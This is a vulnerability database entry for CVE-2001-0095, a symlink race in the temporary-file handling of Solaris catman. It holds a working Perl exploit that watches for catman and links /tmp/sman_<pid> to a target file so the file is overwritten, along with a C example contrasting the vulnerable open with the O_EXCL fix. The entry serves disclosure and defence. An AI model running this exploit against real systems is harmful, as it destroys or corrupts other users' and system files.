Solaris catman File Overwrite Vulnerability

Vulnerability ID: 1106091  Vulnerability type: Unknown
Published: 2000-11-21  Updated: 2005-05-02
CVE ID: CVE-2001-0095
CNNVD ID: CNNVD-200102-018
Platform: Solaris  CVSS score: 1.2
|Sources
https://www.exploit-db.com/exploits/20521
https://cxsecurity.com/issue/WLB-2018090258
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-018
|Details
The catman utility in Solaris 2.7 and 2.8 contains a vulnerability: a local user can overwrite arbitrary files through a symbolic-link attack on the sman_PID temporary file.
|Exploit
source: http://www.securityfocus.com/bid/2149/info
 
catman is a utility for creating preformatted man pages, distributed as part of the Solaris Operating Environment. A problem exists which could allow local users to overwrite or corrupt files owned by other users.
 
The problem occurs in the creation of temporary files by the catman program. Upon execution, catman creates files in the /tmp directory using the file name sman_<pid>, where pid is the Process ID of the running catman process. The creation of a symbolic link from /tmp/sman_<pid> to a file owned and writable by the user executing catman will result in the file being overwritten, or in the case of a system file, corrupted. This makes it possible for a user with malicious intent to overwrite or corrupt files owned by other users, and potentially overwrite or corrupt system files. The Sun BugID for this issue is 4392144. 

#!/usr/local/bin/perl -w
# The problem is catman creates files in /tmp insecurely. They are based on the PID of the catman
# process; catman will happily clobber any files that are symlinked to that file.
# The idea of this script is to watch the process list for the catman process,
# get the pid and create a symlink in /tmp to our file to be
# clobbered.  This exploit depends on system speed and process load.
# This worked on a patched Solaris 2.7 box (August 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
# [email protected]   11/21/2000   Vapid Labs.
# http://vapid.betteros.org

$clobber = "/etc/pass";    # file to be clobbered

while (1) {
    # Poll the process list until a catman process shows up.
    open ps, "ps -ef | grep -v grep | grep -v PID |";

    while (<ps>) {
        @args = split " ", $_;    # $args[1] is the PID column of ps -ef

        if (/catman/) {
            print "Symlinking sman_$args[1] to $clobber\n";
            symlink($clobber, "/tmp/sman_$args[1]");
            exit(1);
        }
    }
    close ps;
}
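The root cause the advisory describes, as an added C example (not Sun's catman code and not part of the original post): open_tmp_predictable reproduces the predictable-name, non-exclusive open that follows a planted symlink, while open_tmp_excl shows the O_CREAT|O_EXCL open that refuses to go through one. run_demo is a hypothetical harness that exercises both inside a private mkdtemp() directory against a constructed victim file, so nothing outside that directory is touched.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern from the advisory: a predictable name sman_<pid>, opened
   without O_EXCL, so a symlink planted at that path is followed and its
   target truncated. Returns the descriptor, or -1 with errno set. */
int open_tmp_predictable(const char *dir, pid_t pid) {
    char path[512];
    snprintf(path, sizeof path, "%s/sman_%ld", dir, (long)pid);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern: O_CREAT|O_EXCL fails with EEXIST when anything (a symlink
   included) already sits at the path, so a planted link is never followed;
   mkstemp(3), which also picks an unpredictable name, is better still. */
int open_tmp_excl(const char *dir, pid_t pid) {
    char path[512];
    snprintf(path, sizeof path, "%s/sman_%ld", dir, (long)pid);
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

static long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Hypothetical harness: in a private mkdtemp() directory, a constructed "victim"
   file is symlinked from sman_<pid> and both opens are tried. Returns 0 when the
   O_EXCL open refuses (victim intact) and the predictable open truncates it. */
int run_demo(void) {
    char dir[] = "/tmp/catman-demo-XXXXXX", victim[600], link[600];
    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(link, sizeof link, "%s/sman_%ld", dir, (long)getpid());
    FILE *f = fopen(victim, "w");
    if (!f || fputs("important data\n", f) == EOF || fclose(f) != 0) return 2;
    if (symlink(victim, link) != 0) return 3;
    int fd = open_tmp_excl(dir, getpid());
    if (fd >= 0 || errno != EEXIST || file_size(victim) != 15) return 4;
    fd = open_tmp_predictable(dir, getpid());
    if (fd < 0 || file_size(victim) != 0) return 5;
    close(fd);
    unlink(link); unlink(victim); rmdir(dir);
    return 0;
}
```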
|References

Source: XF
Name: solaris-catman-symlink(5788)
Link: http://xforce.iss.net/static/5788.php
Source: BUGTRAQ
Name: 20001218 Catman file clobbering vulnerability Solaris 2.x
Link: http://archives.neohapsis.com/archives/bugtraq/2000-12/0313.html
Source: OSVDB
Name: 6024
Link: http://www.osvdb.org/6024
